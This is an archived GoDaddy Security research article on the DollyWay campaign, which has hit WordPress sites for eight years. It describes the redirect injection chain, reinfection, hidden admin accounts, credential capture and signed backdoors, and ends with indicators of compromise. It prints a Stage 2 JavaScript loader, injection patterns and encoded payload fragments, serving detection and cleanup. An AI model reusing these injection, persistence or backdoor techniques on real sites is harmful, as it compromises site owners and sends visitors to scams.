{
	"id": "cc765b78-677e-4262-b3de-e440ea7fef33",
	"created_at": "2026-04-06T00:08:27.401466Z",
	"updated_at": "2026-04-10T03:24:18.226323Z",
	"deleted_at": null,
	"sha1_hash": "a3fde87f597cecbd40ba069b1bdf2876c13ead98",
	"title": "DollyWay World Domination: Eight Years of Evolving Website Malware Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10057215,
	"plain_text": "DollyWay World Domination: Eight Years of Evolving Website Malware\r\nCampaigns\r\nBy Denis Sinegubko\r\nPublished: 2025-03-17 · Archived: 2026-04-05 22:32:03 UTC\r\nKey findings \r\nGoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has\r\ncompromised over 20,000 websites globally in the past 8 years. \r\nCampaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and\r\nCommand and Control (C2) nodes. \r\nThe latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically signed data\r\ntransfers, heterogeneous injection methods, and automatic reinfection mechanisms. \r\nThreat actors attempt to maintain control of compromised sites by removing any competing malware and updating\r\nWordPress.\r\nOverview \r\nGoDaddy Security researchers have uncovered evidence linking multiple malware campaigns into a single, long-running\r\noperation we've named \"DollyWay World Domination\". While previously thought to be separate campaigns, our research\r\nreveals these attacks share common infrastructure, code patterns, and monetization methods - all appearing to be connected\r\nto a single sophisticated threat actor. The operation was named after the following tell-tale string, which is found in some\r\nvariations of the malware: define('DOLLY_WAY', 'World Domination');. \r\nThrough extensive analysis spanning eight years of data, we’ve connected seemingly disparate campaigns including\r\nMaster134, Fake Browser Updates, and CountsTDS into a comprehensive operational timeline. The current iteration, which\r\nwe track as DollyWay v3, primarily targets visitors of infected WordPress sites via injected redirect scripts that employ a\r\ndistributed network of Traffic Direction System (TDS) nodes hosted on compromised websites. 
These scripts redirect site\r\nvisitors to various scam pages through traffic broker networks associated with VexTrio, one of the largest known\r\ncybercriminal affiliate networks that leverages sophisticated DNS techniques, traffic distribution systems, and domain\r\ngeneration algorithms to deliver malware and scams across global networks. While current monetization relies heavily on\r\nredirects, historical campaigns from this actor included more aggressive payloads like ransomware and banking trojans. \r\nThe operation comprises several distinct campaigns known by different names in the security community: \r\nMaster134 (2016-2020): First identified by CheckPoint researchers in 2018 \r\nFake Browser Updates (2018-2019) \r\nCountsTDS / DollyRAT / Backdoor.PHP.DOLLYWAY.A / Multistage WordPress Redirect Kit / R_Evil web shell\r\n(2020-present) \r\nThe latest variant of DollyWay malware demonstrates significant sophistication, employing multiple layers of obfuscation,\r\ncryptographic verification of malicious payloads, and reinfection mechanisms.  \r\nDollyWay: Massive scale and ongoing evolution \r\nThe DollyWay malware works exclusively on WordPress sites. Leveraging a distributed network of C2 and TDS nodes\r\nhosted on compromised sites, it redirects site visitors to VexTrio/LosPollos links. Historically, this operation has also used\r\nAdsTerra, PropellerAds and some other ad networks to monetize traffic from compromised sites. 
\r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 1 of 19\n\nThis campaign is known for its sophisticated ways of infecting websites: \r\nCryptographically signed data transfers \r\nHeterogeneous injection spread across files and database \r\nAutomatic reinfection mechanisms \r\nRemoval of competing third-party malware \r\nWordPress updates and site repairs \r\nAs of February 2025, we have seen over 10,000 unique infected WordPress sites worldwide generating around 10 million\r\nimpressions of web pages with injected malicious scripts for millions of visitors with unique IP addresses every month. \r\nTechnical analysis of current campaign (DollyWay v3) \r\nIn this post, we will refer to the ongoing malicious campaign as DollyWay v3. Version 3 uses wp-content/counts.php\r\nscripts on select compromised sites as C2/TDS, while previous versions of DollyWay malware used different file names. \r\nRedirect script injections \r\nDollyWay v3 employs a sophisticated four-stage injection chain designed to evade detection. \r\nStage 1: Initial injection \r\nThe first stage leverages WordPress's wp_enqueue_script function to append a link to a dynamically generated script\r\nloading from the site's main URL whenever someone visits an infected domain. Each injection includes a unique\r\n32-character hexadecimal parameter — an MD5 hash that serves as a site identifier and is different for each infected site. \r\nFrom now on, we’ll refer to the initial hexadecimal string as \u003chex32\u003e and its derivatives as md5(hex32), md5(md5(hex32))\r\nand so on, depending on how many times the md5 function was applied. 
\r\nThe pattern for the Stage 1 injection is: \r\n\u003cscript src=\"https://\u003cinfected-site\u003e/?\u003cmd5(hex32)\u003e\u0026amp;ver=\u003cWordPress version\u003e\" id=\"\u003cmd5(hex32)\u003e-js\"\u003e\u003c/script\u003e\r\nExample with a redacted domain of an infected site: \r\n\u003cscript src=\"https://[redacted]/?ccb2d976143fb8616e62575fafebccbb\u0026amp;ver=6.6.1\" id=\"ccb2d976143fb8616e62575fa\r\nThe goal is to inject a generic-looking script that will leave security scanners that only do static analysis of the HTML code\r\nwith very little information and hide the real malicious activity in the dynamically generated subsequent stages of the\r\ninjections. \r\nStage 2: Dynamic loading and referrer collection \r\nSince the URL in the Stage 1 script is not a static .js file, the WordPress engine is used to generate its contents. The\r\nDollyWay malware detects that the \u003cmd5(hex32)\u003e parameter is present in the requested URL and hijacks the response\r\ngeneration, producing JavaScript code like this: \r\n(function() {\r\nvar ref;\r\nvar po = document.createElement('script');\r\npo.type = 'text/javascript';\r\npo.async = true;\r\nif(document.referrer.length == 0) {ref = 'undefined';} else {ref = document.referrer;}\r\npo.src = '?\u003cmd5(md5(hex32))\u003e\u0026' + Math.floor(Math.random() * 100000) + '\u0026' + ref;\r\nvar s = document.getElementsByTagName('script')[0];\r\ns.parentNode.insertBefore(po, s);\r\n})();\r\nAt this point, the malware can still evade some static analysis tools that load links found in the HTML code of the page. So,\r\nthe goal of Stage 2 is to block static analysis scanners completely and start collecting information that may be used by a\r\nTDS while not revealing the malicious behavior. 
\r\nTo accomplish this, the Stage 2 script dynamically loads the Stage 3 script from the /?\u003cmd5(md5(hex32))\u003e URL on the\r\nsame site, passing the referrer as an additional parameter along with a random number probably added to divert attention. \r\nThe URLs of the generated Stage 3 scripts look like this: \r\nhttps://[redacted]/?39c67aeb2992af8278ec16172137e422\u002677947\u0026https://www.google.com/\r\nStage 3: TDS script injection \r\nSince static analysis scanners also can’t easily discover the Stage 3 scripts, this is where the real malicious behavior begins.\r\nTo further evade detection, the malware performs some additional server-side filtering as shown below: \r\nThis means that the Stage 3 script will not be generated for:\r\nWordPress users that are currently logged in \r\nKnown bots (the malware maintains its own list of around 102 different bot User-Agent strings) \r\nAny visitors that come from localhost \r\nVisitors that don’t have a referrer (Stage 2 script set to “undefined”) \r\nFor those who don’t fall into the above criteria, the malware generates a script that tries to dynamically load the Stage 4\r\nscripts from 3 random nodes (third-party infected sites). The malware stores a list of current nodes along with other malware\r\nsettings encoded as a WordPress option in the wp_options table. \r\nThese nodes act as TDS (traffic direction system) and use the /wp-content/counts.php path in their URLs to return scripts\r\nthat start the malicious redirect chain. Later, we will show how the nodes also act as C2 servers, providing the malware on\r\ninfected sites with the most up-to-date set of settings. \r\nTDS nodes and TDS script URLs \r\nThe TDS URLs contain two extra parameters ?cat and \u0026t. The \u003ccat\u003e is an integer number from 0 to 5 that specifies the\r\ndesired category of VexTrio scam links to be served to the visitor. 
The category is saved as “dolly_category” along with\r\nother DollyWay settings in the wp_options table. \r\n0 - Dating \r\n1 - Mainstream (Sweepstakes) \r\n2 - Crypto \r\n3 - Gay Dating \r\n4 - Gambling \r\n5 - Cams \r\nDollyWay v3 most frequently uses the Dating (0) and the Mainstream (1) categories. \r\nThe use of three different nodes at the same time can be explained by their desire to ensure the visitor gets redirected, even if\r\nsome of the nodes are taken down. Remember, the nodes are also compromised WordPress sites, and the attack operators\r\ndon’t fully control them and can’t guarantee their uptime. \r\nTo improve the chances that some of the nodes are functional, DollyWay maintains a list of C2/TDS nodes that it stores in its\r\nsettings and updates once a day. The list currently consists of 14 nodes and the Stage 3 script randomly picks three of\r\nthem every time it is triggered. \r\nStage 4: The redirect \r\nThe Stage 4 script returned by the TDS nodes is where the actual redirect code can be found. \r\nAll the nodes typically return the exact same script. To avoid multiple redirects, the malware saves the “test” and the\r\n“click4” parameters (in Nov 2024, changed to “test01” and “click01” respectively) in the browser's local storage whenever a\r\nvisitor gets redirected to a scam site. \r\nThe redirect only occurs if these storage parameters are not found and when a visitor clicks anywhere on a web page. \r\nThe redirects consistently go to VexTrio/LosPollos links with the u=7mkpd0d parameter (affiliate user id in the LosPollos\r\nsystem). The \u0026o parameter changes depending on the category specified in the TDS URL. For example, ex3wmkx\r\ncorresponds to the “Dating (0)” category and is specific to this LosPollos user only. \r\nEach category also has a predefined VexTrio domain name saved on each C2/TDS node. \r\nAfter Stage 4, VexTrio/LosPollos control the redirect chain. Usually, site visitors end up on their scam pages. 
Sometimes the\r\nfinal landing page will be a Google Play page for some legitimate application like Tinder, TikTok, Instagram, that probably\r\nbuys downstream traffic from LosPollos or when their TDS decides that they are not interested in the visitor. \r\nExample of VexTrio/LosPollos scam landing page served by DollyWay redirects. \r\nServer-side analysis: Advanced persistence and stealth mechanisms \r\nNow that we know how this malware works from an external perspective, let's explore how everything works behind the\r\nscenes. \r\nPersistent reinfection mechanism \r\nThe malicious PHP code is injected into all active plugins and as WPCode snippets. \r\nWhat is more interesting is that injections don’t stop once the site is infected. This malware has a sophisticated reinfection\r\nprocedure that takes place every time any WordPress page is opened. \r\nIt consists of 4 main steps: \r\n1. Disables security plugins from its (not very well maintained) built-in list: \r\nWordfence \r\nNinja Firewall \r\nMalCare \r\nwp-cerber (WordPress.org repository says: This plugin has been closed as of September 22, 2022 and is not\r\navailable for download. Reason: Security Issue.) \r\ngotmls/ Anti-Malware Security and Brute-Force Firewall \r\nAll-In-One Security (AIOS) \r\n2. Finds a DollyWay injection in one of the infected plugins or WPCode snippets and re-obfuscates it for every new\r\ninjection: \r\nRandomly renames variables and functions \r\nSplits string constants with random comments \r\n3. Re-injects freshly obfuscated DollyWay code into all active plugins that do not contain valid malware\r\nStrategically adds an extra metadata comment at the top of the file, then injects the malicious code right after that,\r\nprepended with 1000-2000 spaces so that it is not immediately visible. \r\n4. 
Reinfects WPCode snippets \r\nDeletes all WPCode snippets (even legitimate ones) \r\nInserts new re-obfuscated malicious snippets \r\nIn both the files and the WPCode snippets, the injected code looks like this: \r\nWith random variables, function names, and obfuscated string constants, the infection looks slightly different in every\r\ninfected file and DB record.\r\nThis procedure makes it hard to remove the malware as it constantly changes. Moreover, if the site has heavy traffic, the\r\nchances are it will be reinfected in the process of removing malware. If you fail to remove it from all the active plugins and\r\nWPCode snippets before someone loads any page, everything will get reinfected from a single piece of malware that can\r\nstill be found either in infected plugins or in the malicious WPCode snippets. \r\nSo, in the case of cleanup, the best course of action would be to temporarily take the site down (redirect all traffic to some\r\nstatic page) or, at least, disable all plugins. (Note: The WPCode plugin will not be visible from the WordPress dashboard\r\nbecause DollyWay hides it.)\r\nWPCode snippets \r\nThe logic of malware reinfections suggests that the attackers install this plugin on compromised sites and add malicious PHP\r\nsnippets with the execution scope “everywhere”. \r\nDuring the never-ending reinfections, they simply delete all WPCode snippets and create new ones with re-obfuscated code. \r\nIt’s not clear what the attackers do when they compromise a site that already uses this popular plugin (WPCode has over 2\r\nmillion active installations). You can imagine the damage if the site uses WPCode snippets for legitimate functionality. \r\nAs of October 2024, the injected WPCode snippets have specific dates associated with them that can be used as indicators of\r\ncompromise. 
\r\nIn the wp_posts table: \r\npost_date: 2024-07-26 09:19:38 \r\npost_date_gmt: 2024-07-26 09:19:38 \r\npost_title: Untitled Snippet \r\npost_status: publish \r\npost_modified: 2024-07-26 09:25:37 \r\npost_modified_gmt: 2024-07-26 09:25:37 \r\npost_type: wpcode \r\nIn the wp_options table (option_name: wpcode_snippets): \r\nmodified: 2024-08-05 10:55:28 \r\nlocation: everywhere \r\ncode_type: php \r\ntitle: Untitled Snippet \r\nWPCode's presence is pretty visible in the WordPress admin interface — and it is in the attackers’ best interest to keep it a\r\nsecret so that the site admins don’t suspect that something is not right. \r\nTo accomplish this, the malware removes all WPCode menus from the WordPress dashboard and removes WPCode from\r\nthe list of installed plugins. The only way to notice the presence of this plugin and the malicious snippets is to examine the\r\nwp-content/insert-headers-and-footers/ directory and the plugin-related records directly in the WordPress database. \r\nMalicious admin users \r\nThe WPCode plugin is not the only thing that the malware tries to hide from site owners. It also removes the admin user created\r\nby the attackers from the list of existing WordPress users. \r\nSince 2020, this malware has been associated with malicious WordPress admin users whose usernames are random hexadecimal\r\nstrings up to 32 characters long, with the same string used as the email address on a similarly random hexadecimal .com\r\ndomain. 
\r\nKey characteristics of malicious admin accounts: \r\nUsernames: Random hexadecimal strings (up to 32 characters) \r\nEmail pattern: \u003csame-as-username\u003e@[random-hex].com \r\nExample patterns: \r\nUsername: 7591c62c3c443a75fbdf9fadfbe2802f \r\nEmail: 7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8[.]com \r\nUsername: 36e21a1c8c \r\nEmail: 36e21a1c8c@d5b53904ee84dac8d41331f0b[.]com \r\nExamples of malicious usernames and email addresses (note, some of these credentials may also belong to previous iterations\r\nof the DollyWay campaign): \r\nUsername  Email \r\n7591c62c3c443a75fbdf9fadfbe2802f  7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8.com \r\n36e21a1c8c  36e21a1c8c@d5b53904ee84dac8d41331f0b.com \r\n6fcb1f44c9b1772a0  6fcb1f44c9b1772a0@1a8001dc2c3607.com \r\n3cc40c79f2d7217139a8  3cc40c79f2d7217139a8@27d831561ab46a5244a82.com \r\nStealing WordPress admin credentials \r\nAttackers realize that having their own admin user in the system is good, but it is not guaranteed that they will always be able\r\nto use it. Eventually such users get discovered and deleted. Having credentials of real admin users may prove to be a\r\nbetter long-term solution. \r\nThat’s why the malware monitors POST parameters from the login form and dumps them into a hidden (filename starts with\r\n.) downloadable file on the server. \r\nDollyWay backdoors \r\nDollyWay v3 implements multiple sophisticated backdoor mechanisms with cryptographic verification to prevent\r\nunauthorized use of the malware. \r\nWhen a GET request to the site contains a predefined \u003chex32\u003e string, it creates a PHP file with the \u003chex32\u003e.php name and with\r\nthe contents extracted from the HTTP cookie with the same \u003chex32\u003e name. \r\nImplementation of another arbitrary PHP code execution function is more exotic. 
The malware monitors request URLs and,\r\nif it finds one where the part after the last slash is longer than 90 characters, it tries to extract and execute PHP from it. \r\nThe PHP code is not passed in plain text though, and the code execution is preceded by the following procedures on the part\r\nof the request after the last slash: \r\nThe string is sanitized to include only base64 characters. “$” is replaced by “+” and “*” is replaced by “/” \r\nThe string is broken down into three parts: \r\n1. The first 8 characters are the decode key \r\n2. The last 88 characters are the cryptographic signature \r\n3. Everything in between is the encrypted data \r\nThe integrity of the data is verified by the cryptographic signature using the hardcoded public key and the\r\nopenssl_verify function. \r\nIf the integrity of the data is verified, the data is decoded using a custom XOR-based decoding algorithm with additional\r\nlayers of gzip and base64 (let’s call it DollyDecode). \r\nAnother check is performed once the data is decoded. It should contain the ‘host’ property whose value should match\r\nthe host of the infected website where this backdoor is being executed. \r\nIf everything holds, the PHP code from the “code” property of the decoded data is executed. \r\nThis sophisticated backdoor execution procedure has several goals: \r\nAllow sending malicious PHP commands in regular GET requests without using cookies \r\nPrevent unauthorized use of their backdoors by signing the executable code and specifying the domain for which it is\r\nintended: \r\n1. So that no one can use the backdoor to take over the site or remotely clean the infection, and \r\n2. No one can execute properly signed backdoor code on a different host (e.g. if you’ve intercepted the backdoor\r\nrequest for one infected site). 
\r\nEarlier iterations of DollyWay v3 server-side malware \r\nBefore October 2024, DollyWay v3 used a slightly different approach to website infection. It was based on the codebase of\r\nDollyWay v2. \r\nIn 2022, bad actors installed a single “pseudo-legitimate” plugin that was responsible for injection of the redirect scripts into\r\nsite pages. We use the word “pseudo-legitimate” because these plugins are generated from the code of legitimate plugins and\r\nthemes. They have the initial comment with the plugin metadata copied from random legitimate plugins. Their name may\r\nalso match the name of that legitimate plugin. The rest of the content doesn’t have anything to do with it though. It is\r\ncompiled from random functions from random files with sprinkles of malicious code that restores and executes the\r\nDollyWay PHP code from multiple WordPress options with seemingly benign names like organizerLoginUrl or wp_vers. \r\nThis approach made the detection of such plugins challenging since they look legitimate at first glance, there were no\r\nobvious malware markers in the plugin files, the malicious code varied from file to file, and the real DollyWay code could\r\nonly be found encrypted in the WordPress database. \r\nIn 2023, DollyWay shifted from using “pseudo-legitimate” plugins to outright fake “must use” plugins. They were placed in\r\nthe /wp-content/mu-plugins/ directory, which doesn’t require plugin activation. \r\nThis particular variant didn’t pretend to be a legitimate plugin. Inside was only obfuscated code, without any plugin\r\nmetadata whatsoever. 
\r\nThe fake plugins use random autogenerated names like: \r\nchordpress-excellent.php \r\ngig-muambator-howdy.php \r\nultimo-mapjam-insertr-lokalise.php \r\nWhen decoded, you can see the same approach of loading and executing the DollyWay PHP code directly from random\r\nWordPress options. \r\nThe database part of this malware didn’t change much and you can immediately recognize it when you decode the\r\nWordPress option and see this line at the top: \r\nif(!defined('DOLLY_WAY')){ define('DOLLY_WAY', 'World Domination');}\r\nSide-effects of DollyWay malware \r\nSome iterations of DollyWay v3 malware involve file operations for every page load. If you monitor file creation and\r\ndeletion events, such activity may be used as an indicator of compromise. \r\nThe names of the temporary files used by this malware may also look a bit off: \r\ntmp/base64_decode\u003crandom-string\u003e \r\ntmp/plugins\u003crandom-string\u003e \r\ntmp/sys_get_temp_dir\u003crandom-string\u003e \r\n… \r\nAdditional files and backdoors \r\nAnother backdoor can be found injected at the bottom of random legitimate files. It is usually preceded by hundreds of\r\nempty lines, so you may easily miss it when checking files manually. \r\nThe functionality of this backdoor is similar to the first type of backdoor that is integrated into the DollyWay v3 malware. It\r\nexpects the \u003chex32\u003e REQUEST parameter and if it is found, creates a file on the server with the \u003chex32\u003e.php name and\r\nwith the contents of the \u003chex32\u003e parameter. \r\nDollyWay maintenance and WordPress update scripts \r\nTwo PHP files are especially integral to the malware’s operation and tell-tale behavior. \r\nWPU.php: WordPress update utility \r\nThe name of the malicious file, wpu.php, can probably be translated as WordPress Update. 
This script is likely used as a\r\nmaintenance/support utility to repair broken sites, install prerequisites, and start the malware injection process. \r\nThis maintenance script provides several key functions: \r\nWordPress core updates \r\nWPCode plugin installation and updates \r\nMalware installation via the cpl.php script \r\nWe don’t know if all these functions are being used for every injection. What we do know is that we find this file on some\r\ncompromised sites alongside the DollyWay v3 malware and it belongs to the same campaign. \r\nThe wpu.php file updates the target website’s WordPress core files without using any WordPress functionality. The files are\r\nsimply fetched from the WordPress SVN repository https://core.svn.wordpress.org/tag/ and the appropriate WordPress\r\nversion is guessed based on the server's PHP version. \r\nPHP 7.2.0 and newer: the malware chooses WordPress 6.6 \r\nPHP 7.0.x and 7.1.x: the malware chooses WordPress 6.5 \r\nPHP 7.0.0 and older: the malware chooses WordPress 5.1 \r\nThe current iteration of the malware always installs WPCode version 2.2.1. The plugin files are also fetched directly\r\nfrom the SVN repository: \r\nhttps://plugins.svn.wordpress.org/insert-headers-and-footers/tags/2.2.1 \r\nThe script has two main modes of operation that try to accomplish updates in small batches: \r\n1. wpu.php?step=\u003cN\u003e WordPress update \r\n2. wpu.php?ihaf=\u003cN\u003e WPCode update \r\nThe script is intended to work in the browser. You can tell this because it relies on JavaScript redirects to start the next\r\nstage/iteration of the update. \r\nOnce both types of updates are done, the script automatically redirects to the cpl.php script, most likely to finalize the\r\nmalware installation. 
Interestingly, the cpl.php script has two modes of operation based on the presence of the fast_worker cookie:\r\nCpl.php: DollyWay web shell \r\nThe DollyWay v3 malware itself has a function to create cpl.php files, download their PHP code from an external URL,\r\nthen open that file in a browser. \r\nWe also find backdoors that drop cpl.php files. They are heavily encrypted and can be several hundred kilobytes in size.\r\nWhen partially decrypted, we see the use of the same DollyDecode algorithm as in the main malware. In this case, the\r\nmissing decoding parameter is retrieved from the cookie “nd_p”. If this parameter is present, the file also injects a\r\nJavaScript file from //127.0.0.1/d_p.php, i.e. from the attacker's own computer, which suggests the interactive nature of the script. \r\nThe size of the code and the fact that attackers want to load it in a browser suggests that this backdoor is some sort of web shell.\r\nThis hypothesis is backed by the analysis of the cpl.php file used in early iterations of this malware back in 2020, when it\r\nwas possible to easily decrypt it. Let’s just remember that cpl.php was a custom web shell. It has many generic web shell\r\nfunctions such as a “file manager” that can browse, edit, delete and create files, change their permissions, and execute arbitrary\r\nPHP code. However, a significant share of its functionality is specific to this particular malware campaign. 
\r\nFor example, it could: \r\nInject the DollyWay malware into websites (back in 2020, they created a malicious version of the Hello Dolly plugin\r\n/hello/hello.php), \r\nRemove DollyWay malware (all malicious WordPress options, all backdoors, maintenance and files) \r\nInstall, update, debug WordPress \r\nRemove malware from WordPress \r\nYes, the attackers are so interested in every compromised website that they go a long way to make sure it works\r\nproperly and no other malware steals traffic from them or attracts unneeded attention from the site owner to security problems that\r\nmay result in removal of their malware along with other malware that caused the initial scrutiny. \r\nBack in 2020, malware operators already had over 150 complex signatures to detect and remove various types of malware,\r\nincluding signatures for massive third-party campaigns such as Balada Injector: \r\nWe can only speculate that with thousands of infected sites, the maintenance features of the cpl.php script have not been\r\nused for every site, otherwise it would require too much time or dozens of operators working around the clock. Most likely\r\nsuch features are only used for the most important sites (e.g. high-traffic sites or TDS nodes) and for sites with obvious problems. \r\nMalware settings and configuration management \r\nThe malware maintains its configuration through encoded WordPress options, storing settings in a sophisticated but\r\ndiscoverable format. Each infected site maintains a unique identifier and configuration set. 
Settings are stored in the\r\nwp_options table in the option with the hex32 name (unique for each site) as base64-encoded serialized data: \r\na:4:{\r\ns:5:\"nodes\";a:14:{\r\ni:0;s:32:\"//\u003cnode1\u003e/wp-content/\";\r\ni:1;s:37:\"//\u003cnode2\u003e/wp-content/\";\r\ni:2;s:39:\"//\u003cnode3\u003e/wp-content/\";\r\ni:3;s:29:\"//\u003cnode4\u003e/wp-content/\";\r\ni:4;s:24:\"//\u003cnode5\u003e/wp-content/\";\r\ni:5;s:46:\"//\u003cnode6\u003e/wp-content/\";\r\ni:6;s:45:\"//\u003cnode7\u003e/wordpress/wp-content/\";\r\ni:7;s:27:\"//\u003cnode8\u003e/wp-content/\";\r\ni:8;s:36:\"//\u003cnode9\u003e/wp-content/\";\r\ni:9;s:22:\"//\u003cnode10\u003e/wp-content/\";\r\ni:10;s:32:\"//\u003cnode11\u003e/wp-content/\";\r\ni:11;s:29:\"//\u003cnode12\u003e/wp-content/\";\r\ni:12;s:32:\"//\u003cnode13\u003e/wp-content/\";\r\ni:13;s:35:\"//\u003cnode14\u003e/wp-content/\";\r\n}\r\ns:15:\"dolly_last_cron\";i:0;\r\ns:14:\"dolly_category\";i:0;\r\ns:10:\"dolly_name\";s:32:\"\u003chex32\u003e\";\r\n}\r\nThe data consists of a list of (currently 14) nodes. The node URLs belong to infected third-party sites that serve as\r\nautonomous distributed C2/TDS. In the above example, we’ve replaced the domain names of the infected sites with\r\n\u003cnodeN\u003e. \r\nThe nodes are used to retrieve the most current list of nodes and inject redirect scripts into infected pages. \r\nOther settings include: \r\ndolly_last_cron - timestamp of the last time the nodes were updated (only used if the WordPress cron service is\r\ndisabled) \r\ndolly_category - category of VexTrio links to use \r\ndolly_name - unique 32-character long hexadecimal string \u003chex32\u003e \r\nCommand \u0026 Control infrastructure \r\nDaily node list update \r\nThe node list is scheduled to be updated once a day using either WordPress cron jobs or directly through the malware when\r\nsomeone loads an infected web page. 
\r\nTo update the nodes, an infected site makes server-side requests to each of the current nodes until it receives a valid response\r\nfrom any of them. The node update request URLs look like http://\u003cnodeN\u003e/wp-content/data.txt. \r\nA typical response looks like this: \r\nThe first line is a cryptographic signature and the second line is base64-encoded serialized data with new nodes and\r\ncategory codes. \r\nThe nodes array is saved into the malware settings while “subs” are ignored by DollyWay v3. “subs” is a legacy from DollyWay\r\nv2 that used to pass the “subs” values to the TDS URLs. \r\nWhile DollyWay v3 is the most current version of this malware, there are still many infected sites that use the older\r\nDollyWay v2 malware. And all the nodes work for both v2 and v3 malware, which explains why you can see data that is no\r\nlonger used still being passed in the update responses. \r\nCryptographic signatures verify data integrity \r\nThe update data is easy to decode; however, the malware doesn’t immediately trust it. To apply the update, it should be\r\ncorrectly signed with a private key that only the malware operators have. Additionally, to ensure that the data wasn’t\r\ntampered with, the update function uses the public key and the openssl_verify function to verify the signature provided as\r\nthe first line of the update data. \r\nThis is natural behavior for operators who run their C2 centers on compromised sites. This means that at any moment the malware\r\ncan be detected, removed, or modified. So, they need to guarantee the integrity of the data they try to pass to infected sites. 
\r\nConclusion \r\nWhile this analysis provides insight into DollyWay’s current operations, it represents only the latest chapter in an eight-year\r\nevolution of increasingly sophisticated website compromise campaigns. The attention to detail, persistent infrastructure, and\r\nunusual focus on maintaining compromised sites point to a highly organized operation that has learned and adapted over\r\nnearly a decade. \r\nIn our follow-up analysis, we’ll explore the C2/TDS nodes used by DollyWay malware along with how this campaign\r\nevolved from its earliest iteration as “Master134” in 2016 through multiple variants and infrastructure changes. We’ll\r\nexamine how the operators shift to and from ad network redirects, tech support scams and binary fake browser updates. Stay\r\ntuned as we unpack the complete timeline in our next deep-dive. \r\nIndicators of compromise \r\nTDS node script URL pattern: \r\nhttps://\u003ccompromised-site\u003e/wp-content/counts.php?cat=[0|1]\u0026t=\u003cencrypted-ref-domain\u003e\r\nC2 update URL pattern: \r\nhttps://\u003ccompromised-site\u003e/wp-content/data.txt\r\nVexTrio/LosPollos integration: \r\nAffiliate ID before September 2021: u=h2xkd0x \r\nAffiliate ID after September 2021: u=7mkpd0d \r\nLosPollos API key: ea6ff61a45e946c287ea5f121c4f2e4b \r\nDomains and LosPollos categories: \r\nDating: romancezone[.]one \r\nMainstream: topawardpicks[.]top, yourspacegain[.]top \r\nCrypto: coinsboostbonus[.]top \r\nGay Dating: hot-gays-quest[.]life \r\niGaming: your-bigprofit[.]top \r\nCams: myhot-cams[.]life \r\nRedirects after November 20, 2024: \r\nPattern: \r\nhxxps://\u003csubdomain\u003e.\u003capex-domain\u003e/help/?11341608982415\u0026sub_id_1=\u003cencrypted-compromised-domain\u003e\r\nExample: \r\nhxxps://dalopt.participates[.]cfd/help/?11341608982415\u0026sub_id_1=[redacted]\r\nRedirect domains: \r\nabstracts.cngsby[.]cfd \r\nity.anoneth[.]fun 
\r\nadmirable.brehmed[.]cfd \r\nadventure.lantial[.]cfd \r\nalignment.econd[.]cfd \r\nartistry.cngsby[.]sbs \r\nbarometer.unroose[.]space \r\nbreakfast.ffiftringg[.]sbs \r\ncomposure.pedancy[.]fun \r\nconfigure.crellar[.]cfd \r\nconstructive.curvive[.]space \r\nconstructive.lantial[.]us \r\ndalopt.participates[.]cfd \r\ndiscovered.secamondareeng[.]space \r\nexpedient.eithert[.]cfd \r\nframework.chellor[.]cfd \r\nframework.reorget[.]cfd \r\nframework.retiont[.]space \r\nlandscape.chanism[.]sbs \r\nlandscape.goalked[.]cfd \r\nlandslide.postume[.]cfd \r\nmainframe.crellar[.]sbs \r\nmethodical.reorgedt[.]fun \r\nmomentous.debayon[.]sbs \r\noverload.threath[.]sbs \r\nprocedure.secreeng[.]space \r\nresonance.agained[.]cfd \r\nstreaming.threath[.]cfd \r\ntavux.participates[.]cfd \r\ntransmit.chanism[.]cfd \r\ntremendous.mcgonal[.]cfd \r\nvintage.brehmed[.]sbs \r\nworkbench.cudwork[.]cfd \r\noldoak.spindexed[.]site\r\nkeenram.anariding[.]site\r\npremiumservices.approviding[.]store\r\nServer-side IoCs: \r\nFiles used in C2/TDS nodes: \r\nwp-content/counts.php \r\nwp-content/count.php \r\nwp-content/data.txt \r\nwp-content/4052e211471469076d33effdf1795b24 // md5('11341608982415') \r\nWPCode snippets: \r\nTable: wp_posts \r\n'wpcode' \r\npost_date='2024-07-26 09:19:38'\r\nTable: wp_options \r\noption_name='wpcode_snippets' \r\n$wpcode_option['everywhere'][0]['modified'] = '2024-08-05 10:55:28'\r\nEncrypted DollyWay code in wp_options table (earlier modifications): \r\nCgppZighZGVmaW5lZCgnRE9MTFlfV0FZJykpeyBkZWZpbmUoJ0RPTExZX1dBWScsICdXb3JsZCBEb21pbmF0aW9uJyk7f\r\nStrings found in malware (active plugins and WPCode snippets): \r\nunserialize(base64_decode('YToxMDM6e2k6MDtzOjY6ImFocmVmcyI7aToxO3M6ODoiYXN0ZXJpYXMiO2k6MjtzOjE \r\nunserialize(base64_decode('YToxMzp7czoxMToiUGx1Z2luIE5hbWUiO3M6MTE6IlBsdWdpbiBOYW1lIjtzO \r\nTemporary file names: \r\n\u003ctemp-dir\u003e/base64_decode\u003crandom-string\u003e \r\n\u003ctemp-dir\u003e/plugins\u003crandom-string\u003e \r\n\u003ctemp-dir\u003e/sys_get_temp_dir\u003crandom-string\u003e \r\nMalicious admin accounts: \r\nUsernames: random hexadecimal strings (up to 32 characters) \r\nEmail pattern: \u003csame-as-username\u003e@[random-hex].com \r\nUsername  Email \r\n7591c62c3c443a75fbdf9fadfbe2802f  7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8.com \r\n36e21a1c8c  36e21a1c8c@d5b53904ee84dac8d41331f0b.com \r\n6fcb1f44c9b1772a0  6fcb1f44c9b1772a0@1a8001dc2c3607.com \r\n3cc40c79f2d7217139a8  3cc40c79f2d7217139a8@27d831561ab46a5244a82.com \r\nPublic Key: \r\n-----BEGIN PUBLIC KEY-----\r\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKLN9azzu/i/HYvYc+0CW5DViGIuCJbz\r\n23skWsSTwkO6wSga7QJU+m0elAll3iGTFOSFzXChhlluOrW6+VVLXb8CAwEAAQ==\r\n-----END PUBLIC KEY-----\r\nRelated content:\r\nInside DollyWay’s C2 Infrastructure: Traffic Direction Systems and the LosPollos Connection\r\nDollyWay’s Eight-Year Evolution: From Master134 to Modern Malware Infrastructure\r\nSource: https://www.godaddy.com/resources/news/dollyway-world-domination",
